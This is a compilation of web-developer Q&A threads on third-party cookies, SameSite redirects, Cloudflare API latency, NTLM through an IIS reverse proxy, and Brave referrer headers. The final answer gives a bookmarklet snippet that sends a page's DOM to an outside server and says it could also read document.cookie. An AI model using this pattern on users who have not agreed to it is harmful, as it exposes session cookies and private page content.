Given a CORS API that requires a session cookie to track users as they move through a checkout process, there are issues in multiple browsers where the cookie is not set until after the user visits the site the API is hosted on.
For example:
johnny.com uses an CORS JSON API from jacob.com. jacob.com sets a
cookie after the first AJAX call is made, but some browsers will not
set the cookie for subsequent calls. Therefore the API will not
function as expected.
Browser Behavior:
Chrome seems to function fine unless "Third-Party cookies" are
deliberately disabled. There doesn't seem to be a workaround for
this.
IE does not allow the cookie to be set initially unless there is a P3P privacy policy header returned with the initial call.
Safari does not allow the cookie to be set initially unless a hack is used (see: http://measurablewins.gregjxn.com/2014/02/safari-setting-third-party-iframe.html)
Any insight on how to work around these issues is greatly appreciated.
Unfortunately, it seems there are not option to make that work across all browsers.
Safari now restricts third party use of cookies.
It seems the best is to evaluate alternatives :
Setup a proxy server that will redirect the calls to the different services (for example, when you hit johnny.com/jacob/abc, act as proxy to retrieve jacob.com/abc)
Use oauth login on API (it might be impractical)
Move the API under johnny.com/api/...
Paypal has also created several js based solutions to try to go around this kind of problems : https://medium.com/#bluepnume/introducing-paypals-open-source-cross-domain-javascript-suite-95f991b2731d
Related
Trying out cloudflare for ddos protection of an SPA webapp, using free tier for testing.
Static contents loading is fine, but API calls became very slow.
From original <50ms for each api call to around 450~500ms each.
My apis are called via a subdomain eg apiXXX.mydomain.xyz
Any idea the problems or alternative fast ddos protection solution?
Cloudflare has created a page to explain the configuration you have to do when proxyfing APIs :
You have to create a new Page Rule in which you have to bypass cache, turn off Always Online and Browser Integrity Check options.
If you do not configure this, you may have slow response time because all those options are enabled by default on API calls.
Here's the link to create the configuration : Cloudflare Page Rule for API
We have a register page on DomainA.com, which - after successful registration, show a page with a JavaScript redirect to our application App.DomainB.com/direct-login/{login-token}. This has worked for a long time, until we wanted to use SameSite session cookies. With 'Strict' this won't work at all, so we decided to use 'Lax'.
Sadly 'Lax' also did not work. We found out that a back-end redirect (Location: App.DomainB.com/direct-login/token) did do the trick, but we have some Google Analytic events in the front-end of the DomainA.com response. I am not sure if we could move those GA events to the App.DomainB.com, but we would rather not if at all possible.
Another "trick" we tried was creating a back-end redirect controller in DomainA.com, and when the registration was successful, it would show the javascript redirect, but this time redirect to DomainA.com/redirect/token. Sadly trying to trick the browser had no success.
My question is how we could make the redirect from DomainA.com to the direct login URL from on App.DomainB.com, where App.DomainB.com sets a session cookie with SameSite attribute (e.g. Strict or Lax). Hopefully while keeping the GA events on DomainA.com.
If you guys have more questions, I'm happy to eloborate. Code snippets are possible if required.
TLDR; It seems that setting a samesite cookie when being redirected (via a client-side redirect) from another origin is blocked by most, if not all browsers. Is there any way to set the samesite cookie after being redirected from another origin?
EDIT: It turns out, SameSite=Lax does fix the problem.
I think I didn't test it carefully enough, but it turns out that the first fix, using SameSite=Lax actually does fix the problem. The cross origin redirect is being made and the session cookie is set.
It only fails to set the session cookie when using SameSite=Strict.
I hope this answer will help other people with a similar problem.
We use a custom HTTP module in IIS as a reverse proxy for web applications. Generally this works well and has done for some time, but we've come across an issue with Windows Authentication (WA). We're using IE 11, IIS 10 and Server 2016.
When accessing the target site directly, WA works fine - we get a browser login dialog when the initial HTML page is requested and the subsequent requests (CSS, JS, etc) go through fine.
When accessing via our proxy, the same (correct behaviour) happens for the initial html page, the first CSS/JS request authenticates ok too, but the subsequent ones cause a browser login to popup.
What seems to happen on the 'bad' requests (i,.e. those that cause the login dialog) is:
1) Browser decides it needs to authenticate, so sends an Authorization header (Negotiate, with an NTLM token)
2) Server responds (401) with a WWW-Authenticate: Negotiate response with a full NTLM token
3) Browser re-requests with an Authorization header (Negotiate, with a full NTLM token)
4) Server responds (401) with a WWW-Authenticate: Negotiate (with no token), which causes the browser to show the login dialog
5) With login credentials entered, Browser sends the same request as in (1) - identical NTLM token, server responds as in (2), Browser re-requests as in (3), but this time it works!
We've set up a test web site with one html page, requesting 3 JS and 2 CSS files to replicate this. On our test server we've got two sites, one using our reverse proxy and one using ARR. The ARR site works fine. Also, since step (5) above works, we believe that the proxy pass-through is fundamentally working, i.e. NTLM tokens are not being messed up by dodgy encoding, etc.
One thing that does work, is that if we use Fiddler and put breakpoints on each request, we're able to hold back on the 5 sub-requests (JS & CSS files), letting one go through at a time. If we let each sequence (i.e. NTLM token exchange for each URL/file, through to the 200 response), then it works. This made us think that there is some inter-leaving effect (e.g. shared memory corruption) in our proxy, this is still a possibility.
So, we put code at the start of BeginRequest and end of EndRequest with a Synclock and a shared var to store the Path (AppRelativeCurrentExecutionFilePath). This was for our code to 'Single Thread' each of these request/exchanges. This does what we expected, i.e. only allowing one auth exchange to happen and resulting in a 200 before allowing the next. However, we still have the same problem of the server rejecting the first exchange. So, does this indicate something happening in/before BeginRequest, where if we hold the requests back in Fiddler then they work, but not if we do it in our http module?
Or is there some sort of timing issue where the manual breakpoints in Fiddler also mean we’re doing it at ‘human’ speed and therefore allowing things to work better?
One difference we can see is the ‘Connection: Keep-Alive’. That header is in the request from the browser to our proxy site, but not passed from our proxy to the base site, yet the ARR site does pass that through... It’s all using HTTP 1.1. and so we can't find a way to set Keep-Alive on our outgoing request - could this be it?
Regarding 'things to try', we think we've eliminated things like having the site in the Intranet Zone for IE by having the ARR site work ok, and having the same IE settings for that site. Clearly, something is not right, so we could have missed something here!
In short, we've been working on this for days, and have tried most of what we can find on SO and elsewhere, but can't figure out what the heck is going on.
Any suggestions - let me know if you want any further info. All help will be very gratefully received!
I'm using a Google API (e.g., for Maps Embed) with a key that is restricted via a list of HTTP Referrers. In this case, the map is embedded in my.site.com, so within the Google API -> Credentials page, I allow access for referrer .site.com/. When I visit my.site.com from most browsers, Google maps displays correctly as the browser sets the referrer field to my.site.com. When using the Brave browser, however, it sets the referrer field to the origin and displays an error:
Request received from IP address 98.229.177.122, with referrer: https://www.google.com/
Of course I could add google.com to the list of allowed referrers, but that defeats the purpose of limiting the use of the API key to my own website - anyone could "borrow" the API key, add it to their site for the same API, and anyone using Brave would be able to access the feature. Now that each access costs $, I'd rather not do this. Any ideas for a work-around?
Note: #geocodezip - thanks for the reference. Indeed, I forgot to add that when I set the site-specific shield to "All cookies allowed", or even completely turn shields off for the site, the behavior is still the same (error). However, in the default shield settings, when I set the cookies field to "All cookies allowed", then it works as intended (maps are displayed), even though for the default settings section it states:
These are the default Shields settings. They apply to all websites
unless you change something in the Shields panel on a particular site.
Changing these won't affect your existing per-site settings.
which I interpret to mean that the site-specific settings take precedence over the defaults.
So I'm thinking this (site-specific cookies setting not over-riding the default) is a brave bug, though that is a bit separate from my initial hope for a different approach that didn't require manual intervention on the user's part.
I am making app that takes a screenshot of a URL requested by the user. I want to make it as transparent as possible when sites that require username and passwords are in question.
For instance, if user wants to screenshot its iGoogle page, he will send the server URL but, the screenshot will not be the same as what he sees on his screen.
Is there any way to do this ? I guess that in such cases I will have to actually request screenshot from the user. Perhaps user can even deliver me his cookie for that domain.
Any thoughts ?
Ty.
Yes, in most cases you'll need user's cookies.
If site uses regular cookies, you can create bookmarklet that reads document.cookie. This will not work with httpOnly cookies which are used increasingly often for sessions.
Some sites limit sessions to certain IP, and in that case you can't take screenshot without proxying request through user's computer.
If you can get user to use bookmarlet, an interesting trick would be to read and send DOM to your server:
image.src = 'http://example.com?source=' +
escape(document.documentElement.innerHTML);
For HTTP authentication easiest solution would be to ask user for login/password.